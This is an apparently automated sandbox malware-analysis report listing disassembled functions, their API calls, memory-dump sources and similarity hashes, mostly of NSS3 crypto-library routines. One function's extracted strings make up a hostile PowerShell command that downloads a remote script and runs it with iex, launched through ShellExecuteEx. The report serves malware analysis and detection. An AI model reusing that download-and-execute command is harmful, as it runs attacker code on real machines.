                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3381623595-0
                                                                                                                                                                                                              • Opcode ID: 47238ebe10652db26f429c371575fa11929096def802ca0dba9fb488a0e6f895
                                                                                                                                                                                                              • Instruction ID: 5b6d1d314b4af23c4ce27a7d83c9927161927a3451f44b2fd21098c5aeba2d29
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47238ebe10652db26f429c371575fa11929096def802ca0dba9fb488a0e6f895
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9981E5B1B007019BEB019F34DE41AABB7B9BF5424CF194528E85987B01FB31E998C792
                                                                                                                                                                                                              Function 6CADDCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CADAB10: DeleteCriticalSection.KERNEL32(D958E852,6CAE1397,5B5F5EC0,?,?,6CADB1EE,2404110F,?,?), ref: 6CADAB3C
                                                                                                                                                                                                                • Part of subcall function 6CADAB10: free.MOZGLUE(D958E836,?,6CADB1EE,2404110F,?,?), ref: 6CADAB49
                                                                                                                                                                                                                • Part of subcall function 6CADAB10: DeleteCriticalSection.KERNEL32(5D5E6CCD), ref: 6CADAB5C
                                                                                                                                                                                                                • Part of subcall function 6CADAB10: free.MOZGLUE(5D5E6CC1), ref: 6CADAB63
                                                                                                                                                                                                                • Part of subcall function 6CADAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CADAB6F
                                                                                                                                                                                                                • Part of subcall function 6CADAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CADAB76
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CADDCFA
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000), ref: 6CADDD0E
                                                                                                                                                                                                              • PK11_IsFriendly.NSS3(?), ref: 6CADDD73
                                                                                                                                                                                                              • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6CADDD8B
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CADDE81
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CADDEA6
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CADDF08
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 519503562-0
                                                                                                                                                                                                              • Opcode ID: b312b79ebe205ee1f738b5109cf60af6d09c7720d62b94072882ef46f46c086f
                                                                                                                                                                                                              • Instruction ID: 2f4bf632817458750abce53ac99e3fe67b84ae501e4041b3fa1c37795c8d9cc1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b312b79ebe205ee1f738b5109cf60af6d09c7720d62b94072882ef46f46c086f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E791B4B5E011059FDB00CF68C981BAABBB5BF54308F1A4029D8199B741EB31F995CFA1
                                                                                                                                                                                                              Function 6CAB2D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __allrem
                                                                                                                                                                                                              • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                                                                                                                                                              • API String ID: 2933888876-3221253098
                                                                                                                                                                                                              • Opcode ID: 341c7538723d55f336bdb6af5e366c3bdff22c93f9f74ae8b451137007939430
                                                                                                                                                                                                              • Instruction ID: 1aba56903e966720991c17abe39a0e5c97f1ac912efbc67ab1daf7ef9b947787
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 341c7538723d55f336bdb6af5e366c3bdff22c93f9f74ae8b451137007939430
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3161C171B002049FDB04CF69DC98AAA7BB5FF49354F14822DE915EBB90DB35AC46CB90
                                                                                                                                                                                                              Function 6CAEDEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAEDF37
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAEDF4B
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAEDF96
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CAEE02B
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CAEE07E
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAEE090
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CAEE0AF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Error$Unlock$CriticalEnterSectionValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4073542275-0
                                                                                                                                                                                                              • Opcode ID: 585fcc2153d45ea8c3654acebe3eb587bf6a8c3d136bab500c116f52988d70a7
                                                                                                                                                                                                              • Instruction ID: dc016c5a748ae4c7240242c8d7e3543b7540eedb3784cb46df7096fe1fd28d3a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 585fcc2153d45ea8c3654acebe3eb587bf6a8c3d136bab500c116f52988d70a7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA519D71A40600CFEB20DE29D844B5A73B5FF88318F244929E85A87F91D735E9C8DBD2
                                                                                                                                                                                                              Function 00932DB0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 121COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(?), ref: 00932F00
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ')", xrefs: 00932E53
                                                                                                                                                                                                              • C:\ProgramData\, xrefs: 00932DE3
                                                                                                                                                                                                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00932E58
                                                                                                                                                                                                              • .ps1, xrefs: 00932E33
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00932E9B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              • API String ID: 2215929589-1989157005
                                                                                                                                                                                                              • Opcode ID: 3fe3f035e13b0a0b58fd360818739134098e2796e8c6f4833e112faa88a43f3c
                                                                                                                                                                                                              • Instruction ID: c91e297d4acfad470fefd7fe944f4d65fd97bc1d62c277bd60bc7a432c91ea8f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fe3f035e13b0a0b58fd360818739134098e2796e8c6f4833e112faa88a43f3c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D041F835D00228ABCF11FFA5ED42ACDBBB4AF88704F504166F544B7116DB70AE8A8F80
                                                                                                                                                                                                              Function 6CB0AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CB0AB3E,?,?,?), ref: 6CB0AC35
                                                                                                                                                                                                                • Part of subcall function 6CAECEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CAECF16
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CB0AB3E,?,?,?), ref: 6CB0AC55
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CB0AB3E,?,?), ref: 6CB0AC70
                                                                                                                                                                                                                • Part of subcall function 6CAEE300: TlsGetValue.KERNEL32 ref: 6CAEE33C
                                                                                                                                                                                                                • Part of subcall function 6CAEE300: EnterCriticalSection.KERNEL32(?), ref: 6CAEE350
                                                                                                                                                                                                                • Part of subcall function 6CAEE300: PR_Unlock.NSS3(?), ref: 6CAEE5BC
                                                                                                                                                                                                                • Part of subcall function 6CAEE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CAEE5CA
                                                                                                                                                                                                                • Part of subcall function 6CAEE300: TlsGetValue.KERNEL32 ref: 6CAEE5F2
                                                                                                                                                                                                                • Part of subcall function 6CAEE300: EnterCriticalSection.KERNEL32(?), ref: 6CAEE606
                                                                                                                                                                                                                • Part of subcall function 6CAEE300: PORT_Alloc_Util.NSS3(?), ref: 6CAEE613
                                                                                                                                                                                                              • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CB0AC92
                                                                                                                                                                                                              • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB0AB3E), ref: 6CB0ACD7
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6CB0AD10
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CB0AD2B
                                                                                                                                                                                                                • Part of subcall function 6CAEF360: TlsGetValue.KERNEL32(00000000,?,6CB0A904,?), ref: 6CAEF38B
                                                                                                                                                                                                                • Part of subcall function 6CAEF360: EnterCriticalSection.KERNEL32(?,?,?,6CB0A904,?), ref: 6CAEF3A0
                                                                                                                                                                                                                • Part of subcall function 6CAEF360: PR_Unlock.NSS3(?,?,?,?,6CB0A904,?), ref: 6CAEF3D3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2926855110-0
                                                                                                                                                                                                              • Opcode ID: 73c893f8e0a2bb04a8f427f08a46b560f457af656c61f428e621e222414a848a
                                                                                                                                                                                                              • Instruction ID: d3625a451a6d7c8ce7873348d44c056883120415870c9bb668ceb1b213e0a6bc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73c893f8e0a2bb04a8f427f08a46b560f457af656c61f428e621e222414a848a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F313BB1F0024A5FEB10CF65CC409AF7B76EF84318B1A8528E8159B740EB31DD05CBA1
                                                                                                                                                                                                              Function 6CAE8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_Now.NSS3 ref: 6CAE8C7C
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBD0A27), ref: 6CB89DC6
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBD0A27), ref: 6CB89DD1
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB89DED
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAE8CB0
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAE8CD1
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAE8CE5
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CAE8D2E
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CAE8D62
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAE8D93
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3131193014-0
                                                                                                                                                                                                              • Opcode ID: e33fbd9a17438b2e38ba12a64282d7ade6bd50c7a39dba85338b5458cd4f4efc
                                                                                                                                                                                                              • Instruction ID: c2af86bb1a07f8bbdd1bc362313065c4c1a78b46b944e16a4c72964f1b0dcd30
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e33fbd9a17438b2e38ba12a64282d7ade6bd50c7a39dba85338b5458cd4f4efc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C316A71E01601AFDB00AF6DDC80B9AB774FF59318F140136EA1967B50D771A9A4C7C1
                                                                                                                                                                                                              Function 6CB29D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6CB29C5B), ref: 6CB29D82
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: TlsGetValue.KERNEL32 ref: 6CB214E0
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: EnterCriticalSection.KERNEL32 ref: 6CB214F5
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: PR_Unlock.NSS3 ref: 6CB2150D
                                                                                                                                                                                                              • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6CB29C5B), ref: 6CB29DA9
                                                                                                                                                                                                                • Part of subcall function 6CB21340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CAC895A,00000000,?,00000000,?,00000000,?,00000000,?,6CABF599,?,00000000), ref: 6CB2136A
                                                                                                                                                                                                                • Part of subcall function 6CB21340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CAC895A,00000000,?,00000000,?,00000000,?,00000000,?,6CABF599,?,00000000), ref: 6CB2137E
                                                                                                                                                                                                                • Part of subcall function 6CB21340: PL_ArenaGrow.NSS3(?,6CABF599,?,00000000,?,6CAC895A,00000000,?,00000000,?,00000000,?,00000000,?,6CABF599,?), ref: 6CB213CF
                                                                                                                                                                                                                • Part of subcall function 6CB21340: PR_Unlock.NSS3(?,?,6CAC895A,00000000,?,00000000,?,00000000,?,00000000,?,6CABF599,?,00000000), ref: 6CB2145C
                                                                                                                                                                                                              • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6CB29C5B), ref: 6CB29DCE
                                                                                                                                                                                                                • Part of subcall function 6CB21340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CAC895A,00000000,?,00000000,?,00000000,?,00000000,?,6CABF599,?,00000000), ref: 6CB213F0
                                                                                                                                                                                                                • Part of subcall function 6CB21340: PL_ArenaGrow.NSS3(?,6CABF599,?,?,?,00000000,00000000,?,6CAC895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6CB21445
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008,6CB29C5B), ref: 6CB29DDC
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6CB29C5B), ref: 6CB29DFE
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CB29C5B), ref: 6CB29E43
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6CB29C5B), ref: 6CB29E91
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                                • Part of subcall function 6CB21560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6CB1FAAB,00000000), ref: 6CB2157E
                                                                                                                                                                                                                • Part of subcall function 6CB21560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CB1FAAB,00000000), ref: 6CB21592
                                                                                                                                                                                                                • Part of subcall function 6CB21560: memset.VCRUNTIME140(?,00000000,?), ref: 6CB21600
                                                                                                                                                                                                                • Part of subcall function 6CB21560: PL_ArenaRelease.NSS3(?,?), ref: 6CB21620
                                                                                                                                                                                                                • Part of subcall function 6CB21560: PR_Unlock.NSS3(?), ref: 6CB21639
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3425318038-0
                                                                                                                                                                                                              • Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                                                              • Instruction ID: 5e43a930f0d88bf69db3e2bcd1065a63aa1ab2f42ce7aff4141b178fd234831a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C417FB4901646AFE7409F15D840BA6BBA5FF45348F148128D81C4BFA0EB76E838CF91
                                                                                                                                                                                                              Function 6CAEDDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CAEDDEC
                                                                                                                                                                                                                • Part of subcall function 6CB20840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB208B4
                                                                                                                                                                                                              • PK11_DigestBegin.NSS3(00000000), ref: 6CAEDE70
                                                                                                                                                                                                              • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CAEDE83
                                                                                                                                                                                                              • HASH_ResultLenByOidTag.NSS3(?), ref: 6CAEDE95
                                                                                                                                                                                                              • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CAEDEAE
                                                                                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CAEDEBB
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAEDECC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
